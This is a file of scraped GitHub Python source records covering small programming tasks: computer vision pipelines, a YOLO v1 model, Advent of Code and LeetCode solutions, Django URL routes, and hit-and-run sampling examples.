dict()\n for st,ed in tickets:\n # if it is already in the dict\n if st in route:\n route[st].append(ed)\n #make the value a list\n else:\n route[st] = [ed]\n print(route)\n \n # stack\n stack = ['ICN']\n \n while stack:\n now = stack[-1]\n\n # if now is not in route or its destination list is empty\n if now not in route or len(route[now])==0:\n answer.append(stack.pop())\n else:\n stack.append(route[now].pop())\n # reverse again because we popped from a stack\n answer.reverse()\n return answer","repo_name":"yuiseo/ProblemSolving","sub_path":"프로그래머스/lv3/43164. 여행경로/여행경로.py","file_name":"여행경로.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27692947708","text":"# -*- coding=utf-8 -*-\n\n\"\"\"\nCreate yolo_v1 model.\n\nDate: 2018/03/21\nAuthor: lvhao\n\"\"\"\n\nimport numpy as np\nfrom keras.layers import Conv2D, LeakyReLU, MaxPooling2D, Dense, Flatten, Dropout\nfrom keras.models import Model\n\n\ndef conv2d_LeakyReLU(inputs, filters, alpha, kernel=(3, 3), strides=(1, 1)):\n \"\"\"\n Do 2d-conv with LeakyReLU.\n :param inputs: Input tensor of shape (samples, rows, cols, 3)\n :param filters: Integer, the number of kernels.\n :param kernel: kernel size.\n :param strides: strides.\n :return: Output tensor block.\n \"\"\"\n\n x = Conv2D(filters, kernel, strides=strides, padding='same')(inputs)\n x = LeakyReLU(alpha)(x)\n\n return x\n\n\ndef check_input_shape(inputs):\n \"\"\"\n Check inputs' type and shape.\n Raise ValueError.\n :return: None\n \"\"\"\n\n shape = inputs.shape\n if len(shape) != 4:\n raise ValueError('Input shape is not proper!')\n\n if shape[1] != 448 or shape[2] != 448 or shape[3] != 3:\n raise ValueError('Input shape should be 448x448x3!')\n\n\ndef YOLOV1(inputs):\n \"\"\"\n Build YOLO v1 network.\n :param inputs: images of shape (samples, rows, cols, channels)\n :return:\n \"\"\"\n check_input_shape(inputs)\n\n alpha = 0.1\n\n x = conv2d_LeakyReLU(inputs, 64, alpha, (7, 7), strides=2)\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n x = conv2d_LeakyReLU(x, 192, alpha, (3, 3))\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n x = conv2d_LeakyReLU(x, 128, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 256, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 256, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 512, alpha, (3, 3))\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n for _ in range(4):\n x = conv2d_LeakyReLU(x, 256, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 512, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 512, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 1024, 
alpha, (3, 3))\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n for _ in range(2):\n x = conv2d_LeakyReLU(x, 512, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3), strides=2)\n print(x.shape)\n\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n print(x.shape)\n\n x = Flatten(name='flatten')(x)\n x = Dense(4096, name='fc1')(x)\n x = LeakyReLU(alpha)(x)\n x = Dropout(0.5)(x)\n print(x.shape)\n\n x = Dense(7 * 7 * 30, name='fc2')(x)\n print(x.shape)\n\n model = Model(inputs, x, name='YOLO_v1')\n\n return model\n\ndef loss(y_true, y_pred, lambda_c=5, lambda_n=0.5):\n \"\"\"\n Calculate loss\n :param y_true: ground truth\n :param y_pred: predicted output\n :param lambda_c: loss weight of position item\n :param lambda_n: loss weight of no obj item\n :return: final loss\n \"\"\"\n\n grid_side = 7\n grid_len = 448//grid_side\n bbox_num = 2\n\n # create I to define which grid has object\n I_i = np.zeros([grid_side, grid_side])\n for y_true_data in y_true:\n posi = y_true_data['pos']\n _x, _y, _w, _h = posi[0],posi[1],posi[2],posi[3]\n I_i[_y//grid_len:(_y + _h)//grid_len + 1,\n _x//grid_len:(_x + _w)//grid_len + 1] = 1\n\n #\n\n return\n\n\n\n\n\n\n\n","repo_name":"Jadecity/KerasPrj","sub_path":"YOLO_v1/yolo_v1.py","file_name":"yolo_v1.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8937119255","text":"\"\"\"\nLane-finding pipeline\n\"\"\"\nimport glob\nimport os\nimport cProfile\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom calibrate import calibrate, undistort\nimport threshold as th\nimport perspective_transform as pt\nfrom lane import Lane\nimport postprocessing as post\n\n\ndef main():\n # calibrate the camera using the given chessboard images\n ret, mtx, dist, rvecs, tvecs = calibrate(\n path='../camera_cal/calibration*.jpg', \n xy=(9, 6),\n draw_corners=False\n )\n\n # inst. Lane object\n lane = Lane()\n\n # read video\n predicted_frames = []\n input_video = 'project_video.mp4'\n cap = cv2.VideoCapture(os.path.join('../input_videos/', input_video))\n while cap.isOpened():\n ret, frame = cap.read()\n\n if not ret:\n print('Cant receive frame. 
Exiting..')\n break\n \n # undistort an image\n rgb_img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # BGR => RGB\n undist = undistort(rgb_img, mtx, dist)\n\n # convert to gray\n gray = cv2.cvtColor(undist, cv2.COLOR_RGB2GRAY) # RGB => GRAY\n\n # apply gradient and color thresholding\n gradx = th.abs_sobel_thresh(gray)\n direction = th.dir_thresh(gray)\n gradient_binary = np.zeros_like(direction)\n gradient_binary[(gradx == 1) & (direction == 1)] = 1\n\n color_binary = th.saturation_thresh(frame)\n\n # combine gradient and color thresholding\n thresholded_img = th.threshold(gradient_binary, color_binary)\n\n # perspective transform: easier to measure curvature of lane from bird's eye view\n # also makes it easier to match car's location with a road map\n src, dst, M, M_inv = pt.get_transform_matrix()\n\n # transform image\n size = (thresholded_img.shape[1], thresholded_img.shape[0])\n transformed_img = cv2.warpPerspective(thresholded_img, M, size)\n\n # draw lines on transformed\n gray_transformed_img = np.uint8(transformed_img*255)\n bgr_transformed_img = cv2.cvtColor(gray_transformed_img, cv2.COLOR_GRAY2BGR)\n #pt.draw_plot_save(bgr_transformed_img, dst, 'Test Transformation', '../output_images/test_transform.png')\n\n # fit lines\n left_fit, right_fit, y, offset_meters = lane.fit_polynomials(transformed_img)\n\n # create blank for drawing lane lines\n zeros = np.zeros_like(transformed_img).astype(np.uint8)\n draw_img = np.dstack((zeros, zeros, zeros))\n \n # format points for fill poly\n pts_left = np.array([np.transpose(np.vstack([left_fit, y]))]) # [left_fit ... y]\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fit, y])))])\n pts = np.hstack((pts_left, pts_right)) # [pts_left, pts_right]\n cv2.fillPoly(draw_img, np.int_([pts]), (0, 255, 0))\n\n # unwarp transformed image\n unwarped = cv2.warpPerspective(draw_img, M_inv, (gray.shape[1], gray.shape[0]))\n\n # combine lane drawing w/ original image\n final_image = cv2.addWeighted(undist, 1, unwarped, 0.25, 0)\n\n # add measurement data to frame\n offset_side = 'left' if offset_meters < 0 else 'right'\n final_image = cv2.putText(final_image, f'Offset: {abs(offset_meters):0.2f}m {offset_side} of center', (50, 50), \n cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n \n # show predict\n cv2.imshow('frame', cv2.cvtColor(final_image, cv2.COLOR_RGB2BGR))\n\n # store predicted frames\n predicted_frames.append(final_image)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\n\n # release cap object\n cap.release()\n cv2.destroyAllWindows()\n\n # use predicted frames to convert back to video\n # video_frames = post.write_images(predicted_frames, '../video_frames/')\n # clip = post.make_video(video_frames, os.path.join('../output_videos/', input_video))\n # post.write_gif(\n # clip=clip, \n # path=os.path.join('../output_videos/', input_video + '.gif'),\n # sub_start=15,\n # sub_end=25\n # )\n\ncProfile.run('main()', sort='cumulative')","repo_name":"grantgasser/advanced-lane-finding","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"7687388126","text":"import os\nimport sys\npath = './src'\nsys.path.append(path)\n\nfrom .src import model as modellib \nfrom . 
import playerdetection_maskrcnn as pldec\nfrom Logger import Logger\n\nclass PlayerDetector:\n def __init__(self, useGpu):\n logger = Logger(\"Initializing player detector\")\n\n logger.log(\"Initializing\")\n MODEL_DIR = os.path.join(os.getcwd(), \"PlayerDetector/trained_networks/\")\n COCO_MODEL_PATH = os.path.join(MODEL_DIR, \"mask_rcnn_coco_humanpose.h5\")\n self.coco_config = pldec.InferenceConfig()\n self.coco_model = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=self.coco_config) \n self.coco_model.load_weights(COCO_MODEL_PATH,by_name = True)\n logger.log(\"Initialized\")\n\n def detect_players(self, frame):\n detectionLogger = Logger(\"Player detection\")\n detectionLogger.log(\"Start\")\n detection_result = pldec.detectplayerskeypoints(frame, self.coco_config, self.coco_model)[0]\n\n # The feet coordinates are returned\n playersfeetcoos = pldec.findplayersfeetcoos(detection_result)\n\n # These coordinates are not yet used but can later be added to analysis\n playersneckcoos = pldec.findplayersneckcoos(detection_result)\n playerkeypoints = pldec.findplayerkeypointsall(detection_result)\n playertorsokeypoints = pldec.findplayerkeypointstorso(detection_result)\n playergeneralfeatures = pldec.findplayergeneralfeatures(detection_result)\n\n detectionLogger.log(\"Completed\")\n\n return playersfeetcoos, playerkeypoints","repo_name":"the-alex-b/Football-Tracking","sub_path":"PlayerDetector/PlayerDetector.py","file_name":"PlayerDetector.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"7484182908","text":"import re\n\ndef get_input():\n with open('input14.txt') as file:\n return [x.strip() for x in file if x.strip()!=\"\"]\n\ndef parse_instruction(line):\n m = None\n if line.startswith(\"mask\"):\n m = re.fullmatch(\"mask = ([01X]+)\", line)\n return \"mask\", m.groups()[0]\n else:\n m = re.fullmatch(\"mem\\\\[(\\\\d+)\\\\] = (\\\\d+)\", line)\n return \"mem\", int(m.groups()[0]), int(m.groups()[1])\n\nclass Machine:\n def __init__(self):\n self.current_bitmask = None\n self.memory = {}\n\n def run(self, program):\n for statement in map(parse_instruction, program):\n instruction = statement[0]\n if instruction == \"mask\":\n self.current_bitmask = statement[-1]\n elif instruction == \"mem\":\n self.set_memory(statement[-2], statement[-1])\n else:\n raise \"Invalid instruction\"\n \n def set_memory(self, offset, value):\n if self.current_bitmask is not None:\n value = value | int(self.current_bitmask.replace(\"X\", \"0\"), 2)\n value = value & int(self.current_bitmask.replace(\"X\", \"1\"), 2)\n \n self.memory[offset] = value\n\nmachine = Machine()\nprogram = get_input()\nmachine.run(program)\n\nprint(f\"Sum of memory values for first program: {sum(machine.memory.values())}\")\n\nclass Machine2:\n def __init__(self):\n self.current_bitmask = None\n self.memory = {}\n\n def run(self, program):\n for statement in map(parse_instruction, program):\n instruction = statement[0]\n if instruction == \"mask\":\n self.current_bitmask = statement[-1]\n elif instruction == \"mem\":\n self.set_memory(statement[-2], statement[-1])\n else:\n raise \"Invalid instruction\"\n \n def set_memory(self, offset, value):\n mem_address = self.apply_mask(offset)\n\n count = self.current_bitmask.count(\"X\")\n for i in range(pow(2,count)):\n new_address = mem_address\n bits = f\"{i:036b}\"[-count:]\n for j in range(count):\n new_address = new_address.replace(\"X\", bits[j], 1)\n \n 
self.memory[int(new_address)] = value\n\n def apply_mask(self, offset):\n def combine(x,y):\n if x==\"0\": return y\n elif x==\"1\": return \"1\"\n else: return \"X\"\n\n tmp = map(combine, self.current_bitmask, f\"{offset:036b}\")\n return \"\".join(list(tmp))\n\n\n\nmachine2 = Machine2()\nmachine2.run(program)\n\nprint(f\"Sum of memory values for second program: {sum(machine2.memory.values())}\")\n","repo_name":"torarve/aoc2020","sub_path":"aoc14.py","file_name":"aoc14.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74859594278","text":"\n\nimport torch\nfrom transformers import BertTokenizer, BertModel\n\n# Load the BERT tokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n\n# Encode the text input as a sequence of token-ids\ninput_ids = torch.tensor([tokenizer.encode(\"Here is a sample input text.\", add_special_tokens=True)])\n\n# Load the BERT model\nmodel = BertModel.from_pretrained('bert-base-uncased')\n\n# Put the model in evaluation mode\nmodel.eval()\n\n# Forward pass the encoded text through the model\nwith torch.no_grad():\n outputs = model(input_ids)\n last_hidden_states = outputs[0] # The last hidden state is the representation of the input text\n","repo_name":"abhayc-glitch/save","sub_path":"src/pretrained_impl.py","file_name":"pretrained_impl.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"895401909","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = \"api\"\n\nurlpatterns = [\n path(\"user_history/\", views.api_current_user_history, name=\"current_user_history\"),\n path(\"inwarehouse_data/\", views.api_exists_inwarehouse_data, name=\"exists_inwarehouse_data\"),\n]\n","repo_name":"sola1121/worker_warehouse","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28520642054","text":"# %%\nfrom torch_geometric.datasets import AMiner,OGB_MAG,DBLP,IMDB,LastFM,HGBDataset,Taobao\nimport torch_geometric.transforms as T\ndef load_graph(graph_name:str):\n \n if graph_name == 'aminer':\n data_set = AMiner(root='./data/aminer')\n graph = data_set[0]\n return graph\n elif graph_name == 'ogb-mag':\n data_set = OGB_MAG(root='./data/ogb_mag',transform=T.ToUndirected())\n graph = data_set[0]\n return graph\n elif graph_name == 'dblp':\n data_set = DBLP(root='./data/dblp')\n graph = data_set[0]\n return graph\n elif graph_name == 'imdb':\n data_set = IMDB(root='./data/imdb')\n graph = data_set[0]\n return graph\n elif graph_name == 'last-fm':\n data_set = LastFM(root='./data/last_fm')\n graph = data_set[0]\n return graph\n elif graph_name == 'hgb':\n data_set = HGBDataset(root='./data/hgb',name=\"ACM\")\n graph = data_set[0]\n return graph\n elif graph_name == 'taobao':\n data_set = Taobao(root='./data/taobao',transform=T.ToUndirected())\n graph = data_set[0]\n return graph\n pass\n\n# %%\nif __name__ == \"__main__\":\n\n graph = load_graph('aminer')\n print(\"aminer\")\n print(graph)\n graph = load_graph('ogb-mag')\n print(\"ogb-mag\")\n print(graph)\n graph = load_graph('dblp')\n print(\"dblp\")\n print(graph)\n graph = load_graph('imdb')\n print(\"imdb\")\n print(graph)\n graph = load_graph('movie-lens')\n print(\"movie-lens\")\n print(graph)\n graph = load_graph('last-fm')\n 
print(\"last-fm\")\n print(graph)\n graph = load_graph('hgb')\n print(\"hgb\")\n print(graph)\n graph = load_graph('taobao')\n print(\"taobao\")\n print(graph)\n# %%\n","repo_name":"shenjiangqiu/hetero_py","sub_path":"python/src/hetro_py/load_graph.py","file_name":"load_graph.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42146167147","text":"from django.urls import path\nfrom . import views\nfrom django.conf.urls import url\n\napp_name = 'courses'\n\nurlpatterns = [\n # path(r'^$', views.class_search, name='class_search'),\n path('search/', views.class_search, name='class_search'),\n path('register_course/', views.course_registration, name='course_registration'),\n path('course_drop/', views.course_drop, name='course_drop'),\n path('', views.courses_offered, name='courses_offered'),\n path('list_classes/', views.list_classes, name='list_classes'),\n path('course_allocation/', views.course_allocation_view, name='course_allocation_view'),\n path('add_score/', views.add_score, name='add_score'),\n path('add_score//', views.add_score_for, name='add_score_for'),\n path('view_result/', views.view_result, name='view_result'),\n path('first_class_list/', views.first_class_list, name='first_class_list'),\n path('repeating_list/', views.repeat_list, name='repeat_list'),\n path('add_class/', views.add_class, name='add_class'),\n path('add_course/', views.add_course, name='add_course'),\n path('wait_list/', views.wait_list_view, name='wait_list_view'),\n path('set_up_session/', views.set_up_session, name='set_up_session'),\n path('academic_sessions/', views.sessions_list, name='academic_sessions_list'),\n path('academic_sessions//', views.session_details, name='academic_session_details'),\n path('warning/', views.send_warnings_auto, name='send_warnings_auto'),\n\n#-----------------------------------------------------------------------------------------#\n# Reviews Classes URLs #\n#-----------------------------------------------------------------------------------------#\n path('course_list/', views.course_list, name='course_list'),\n path('course_list//', views.course_detail, name='course_detail'),\n path('course_list//add_review/', views.add_review, name='add_review'),\n path('review_list/', views.review_list, name='review_list'),\n path('review_list//', views.review_detail, name='review_detail'),\n path('best_rated/', views.best_rated_classes, name='best_rated_classes'),\n\n\n\n\n\n path('description/', views.description, name='description'),\n \n # path('description//', views.description, name='description'),\n\n]\n\n\n\n\n\n# from django.shortcuts import render\n# from django.db.models import Q\n# from posts.models import Post\n\n# def searchposts(request):\n# if request.method == 'GET':\n# query= request.GET.get('q')\n\n# submitbutton= request.GET.get('submit')\n\n# if query is not None:\n# lookups= Q(title__icontains=query) | Q(content__icontains=query)\n\n# results= Post.objects.filter(lookups).distinct()\n\n# context={'results': results,\n# 'submitbutton': submitbutton}\n\n# return render(request, 'search/search.html', context)\n\n# else:\n# return render(request, 'search/search.html')\n\n# else:\n# return render(request, 
'search/search.html')\n","repo_name":"ej0306/CUNY-ZERO-School-Management-System","sub_path":"courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36411062939","text":"from collections import Counter\n\n\nclass Solution:\n def frequencySort(self, s: str) -> str:\n hashmap = {}\n for i in s:\n hashmap[i] = hashmap.get(i, 0) + 1\n res = ''\n hashmap = sorted(hashmap.items(), key=lambda x: x[1], reverse=True)\n for k, v in hashmap:\n res += k * v\n return res\n\n def frequencySort_simple(self, s: str) -> str:\n '''\n to make it simple\n '''\n # this alternative was unreachable dead code after the return above;\n # it is now a separate method, with the missing Counter import added\n counter = Counter(s)\n cache = sorted([(-v, k) for k, v in counter.items()])\n res = ''\n for count, key in cache:\n res += -count * key\n return res\n","repo_name":"cicihou/LearningProject","sub_path":"leetcode-py/leetcode451.py","file_name":"leetcode451.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3673332633","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 18 10:53:55 2019\n\n@author: s1348875\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport os\nimport pandas as pd\nos.chdir('C:\\TRNSYS18\\MyProjects\\Script to run TRNSYS from python')\n\n\npareto=[]\n\n\nfor i in range(10): # range is the number of pareto fronts generated - 1\n df = pd.DataFrame(pd.read_csv(os.getcwd()+\"\\\\240 ind - 200 gen - 3var - 250120 - STS and boiler fixed\\DLSC_Temuco_multiobj_hof_\"+str(10*i+10)+\".csv\",sep=\",\",header=None,names=['Cost', 'Emissions', 'Solar', 'LTS', 'Angle'],index_col=False))\n pareto.append(df) \nfig, ax = plt.subplots(figsize=(8, 6))\nax.set_xlabel('Emissions')\nax.set_ylabel('Cost')\nax.set(xlim=(0, 2000), ylim=(0, 6000))\nscat = ax.scatter(pareto[0]['Emissions'],pareto[0]['Cost'])\n\n#%%\ndef animate(j):\n scat.set_offsets(pareto[j][['Emissions','Cost']])\nanim = FuncAnimation(fig, animate, frames=10, interval=1000, repeat_delay=1000)\n \nplt.draw()\nplt.show()\n","repo_name":"smaximov84/Python-Code","sub_path":"pareto_animation.py","file_name":"pareto_animation.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"31890396982","text":"from collections import namedtuple\nfrom math import floor, ceil\ninput_file =\"sample.txt\" if 0 else \"input.txt\"\n\nwith open(input_file) as inp:\n target_area = list(map(int, filter(None, (''.join([c if c != ' ' else '.' for c in inp.read() if c.isdigit() or c == '-' or c == '.' 
or c == ' '])).split('.'))))\n # print(target_area)\n target_area = namedtuple('Limits', ['x', 'y'])(namedtuple('Range', ['min', 'max'])(target_area[0], target_area[1]), namedtuple('Range', ['min', 'max'])(target_area[2], target_area[3]))\n print(target_area)\n def step(posx, posy, dx, dy):\n return (posx+dx, posy+dy, dx-1 if dx > 0 else 0, dy-1)\n\n def simulate(x, y, target_area):\n sx, sy = 0, 0\n highest_y = 0\n while sx <= target_area.x.max and sy >= target_area.y.min:\n sx, sy, x, y = step(sx, sy, x, y)\n highest_y = max(highest_y, sy)\n if sx <= target_area.x.max and sx >= target_area.x.min and sy <= target_area.y.max and sy >= target_area.y.min:\n return highest_y, True\n return 0, False\n \n h_hit = 0\n init_vels = []\n # print(init_vels)\n for x in range(target_area.x.max+1):\n for y in range(target_area.y.min, abs(target_area.y.min)):\n highest_hit, hit = simulate(x,y, target_area)\n if hit:\n # print(x,y,highest_hit)\n h_hit = max(h_hit, highest_hit)\n # print((x,y))\n init_vels.append((x,y))\n print(h_hit)\n print(len(sorted(list(set(init_vels)))))\n # def x_after_k(x, k):\n # if k >= x+1:\n # return (x*(x+1))//2\n # else:\n # return (k*(2*x+1-k))//2\n\n # possible_starting_vels = set([])\n # for k in range(1, 5000):\n # if ceil((target_area.y.min + (k*(k-1))//2)/k) != floor((target_area.y.max + (k*(k-1))//2)/k)+1:\n # for x in range(1, 222):\n # possible_starting_vels.update(\n # [(x, dy) for dy in range(ceil((target_area.y.min + (k*(k-1))//2)/k), floor((target_area.y.max + (k*(k-1))//2)/k)+1) if target_area.x.min <= x_after_k(x, k) and target_area.x.max >= x_after_k(x, k)]\n # )\n # possible_starting_vels = sorted(list(possible_starting_vels))\n # print(sorted(list(set([(x, y) for x, y in possible_starting_vels if y >= 0]))))\n # heights = sorted(list(set([(y*(y-1))//2 for _, y in possible_starting_vels if y >= 0])))\n # print(heights[-1])\n","repo_name":"Qwedux/Advent_of_code_2021","sub_path":"Solutions/17/Day_17.py","file_name":"Day_17.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30584999067","text":"# Import modules\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom anyHR.constraint.Constraint import Constraints\nfrom anyHR.hit_and_run.hit_and_run import HitAndRun\n\n\ndef main_hit_and_run_2D_ball():\n # Define variables to use\n var_names = ['x', 'y']\n\n # Define the set of constraint\n c = Constraints(var_names)\n c.add_constraint('(x*x) + (y*y) < 1')\n c.add_constraint('(x*x) + (y*y) > 0.9')\n\n # Define the bounding hyperrectangle\n x_bound = [-10, 10]\n y_bound = [-10, 10]\n bounds = [x_bound, y_bound]\n\n # keyword names matched to the constructor call used elsewhere in this file\n hr = HitAndRun(constraint=c, bounding_box=bounds)\n\n a_s = []\n r_s = [[0, 0]]\n total_rejections = 0\n nb_samples = 100\n for i in range(nb_samples * 100):\n sample, rejections = hr._next_sample_cdhr()\n total_rejections = total_rejections + rejections\n a_s.append(sample)\n import random\n a_s = random.sample(a_s, nb_samples)\n\n print('Total number of rejections: ' + str(total_rejections))\n\n xs = [sample[0] for sample in a_s]\n ys = [sample[1] for sample in a_s]\n\n plt.scatter(xs,ys)\n plt.show()\n # plot_samples_2D(0, 1, var_names[0], var_names[1], a_s, r_s, None)\n\ndef sample_n_sphere_hr(dim:int, n = 100, burn_in_period = 100, thickness = 0.1):\n\n start = time.perf_counter()\n\n var_names = ['x' + str(i) for i in range(dim)]\n\n # Define the set of constraint\n c = Constraints(var_names)\n square_list = ['(' + str(name) + '*' + str(name) + ')' for 
name in var_names]\n\n constraint_str = '+'.join(square_list) + '< 1'\n\n constraint_str2 = '+'.join(square_list) + '> (1-' + str(thickness) + ')' + '* (1-' + str(thickness) + ')'\n\n c.add_constraint(constraint_str)\n c.add_constraint(constraint_str2)\n\n # Define the bounding hyperrectangle\n\n # for name in var_names:\n # locals()[name + '_bound'] = [-1,1] # not necessary\n\n bounds = list([[-1,1] for name in var_names])\n\n\n hr = HitAndRun(constraint=c, bounding_box=bounds)\n\n a_s = []\n r_s = [[0, 0]]\n\n\n samples = np.ndarray((dim, n))\n rejections = 0\n\n for i in range(n):\n\n for j in range(burn_in_period):\n sample, rejections_this_sample = hr.next_sample()\n rejections += rejections_this_sample # TODO does this number make sense to compare?\n\n sample, rejections_this_sample = hr.next_sample()\n rejections += rejections_this_sample\n\n samples[:,i] = sample\n\n end = time.perf_counter()\n\n elapsed = end-start\n\n return rejections, elapsed, samples\n\ndef plot_2d_proj(samples, thickness = None):\n circ = plt.Circle((0,0), 1, fill=False)\n\n fig, ax = plt.subplots(1, subplot_kw={'adjustable' : 'box', 'aspect' : 'equal'})\n ax.scatter(samples[0,:], samples[1,:], s= 3)\n ax.add_patch(circ)\n\n if thickness:\n circ_inner = plt.Circle((0,0), 1-thickness, fill=False)\n ax.add_patch(circ_inner)\n\n plt.show()\n\n\ndef min_example():\n # Define variables to use\n var_names = ['x', 'y']\n\n # Define the set of constraint\n c = Constraints(var_names)\n c.add_constraint('x+y < 1')\n\n # Define the bounding hyperrectangle\n x_bound = [0, 1]\n y_bound = [0, 1]\n bounds = [x_bound, y_bound]\n\n # build hr object\n hr = HitAndRun(constraint=c, bounding_box=bounds)\n\n # generate samples\n samples = []\n total_rejections = 0\n nb_samples = 100\n mixing = 10\n for i in range(nb_samples * mixing):\n sample, rejections = hr.next_sample()\n\n # do some mixing in between samples\n if i % mixing == 0:\n samples.append(sample)\n\n xs = [sample[0] for sample in samples]\n ys = [sample[1] for sample in samples]\n\n plt.scatter(xs,ys)\n plt.show()\n # plot_samples_2D(0, 1, var_names[0], var_names[1], a_s, r_s, None)\n\n\nif __name__ == '__main__':\n # rejections, elapsed, samples = sample_n_sphere_hr(dim=2)\n # plot_2d_proj(samples, thickness = 0.1)\n\n min_example()\n","repo_name":"figlerg/anyHR","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"6926209756","text":"# day23 part 2\n\nclass cup:\n def __init__(self, value, next_cup):\n self.value = value\n self.next_cup = next_cup\n\n\n\ndef create_cups():\n global cup_dict, cups\n\n c = cup(cups[0], None)\n cup_dict[cups[0]] = c\n\n # create a cup for the initial input values\n for i in range(1, len(cups)):\n nxt_cup = cup(cups[i], None)\n c.next_cup = nxt_cup\n \n cup_dict[cups[i]] = nxt_cup\n c = nxt_cup\n\n \n # add remaining cups for values up to 10**6\n for v in range(10, 10**6 + 1):\n nxt_cup = cup(v, None)\n c.next_cup = nxt_cup\n \n cup_dict[v] = nxt_cup\n c = nxt_cup\n \n \n # link last cup back to the starting cup\n nxt_cup.next_cup = cup_dict[cups[0]]\n\n\ndef print_values(n):\n global cups\n\n product = 1\n val = n\n for i in range(3):\n print(val, end = ', ')\n product *= val\n current_cup = cup_dict[val]\n nxt_cup = current_cup.next_cup\n val = nxt_cup.value\n \n print('\\t', product)\n\n\n\ndef play_round():\n global cup_dict, current_cup, destination_cup, MAX\n \n nxt_cup = 
current_cup.next_cup\n next_three_values_to_move = []\n for i in range(3):\n next_three_values_to_move.append(nxt_cup.value)\n nxt_cup = nxt_cup.next_cup\n\n #print('3tomove', next_three_values_to_move)\n \n ### get the destination value ###\n dest_value = current_cup.value - 1\n while dest_value in next_three_values_to_move:\n dest_value -= 1\n # ensure value is not smaller than minimum\n if dest_value == 0:\n dest_value = MAX\n # ensure MAX is not in number to remove\n while dest_value in next_three_values_to_move:\n dest_value -= 1\n\n # get destination cup\n destination_cup = cup_dict[dest_value]\n\n ### adjust pointers ###\n last_cup_to_remove = cup_dict[next_three_values_to_move[-1]]\n # current_cup should now point to whatever the 3rd item to remove was pointing to\n current_cup.next_cup = last_cup_to_remove.next_cup\n \n # destination_cup should now point to 1st item from 3 to remove\n temp_cup_pointer = destination_cup.next_cup # save the destination pointer\n first_cup_to_remove = cup_dict[next_three_values_to_move[0]]\n destination_cup.next_cup = first_cup_to_remove\n \n # last item from 3 to remove should now point to what destination cup was pointing to \n last_cup_to_remove.next_cup = temp_cup_pointer \n\n # update current cup\n current_cup = current_cup.next_cup\n\n\n\n \n\n# global variables\ncups = [2,5,3,1,4,9,8,6,7]\ncup_dict = dict() # value : cup\n\ncreate_cups()\n\ncurrent_cup = cup_dict[cups[0]]\ndestination_cup = None\nMAX = 10**6\n\nmove = 1\nwhile move <= 10**7:\n play_round()\n move += 1\n\nprint_values(1)\n\n\n\n\n","repo_name":"tara0017/Advent-of-Code","sub_path":"2020/day23part2.py","file_name":"day23part2.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
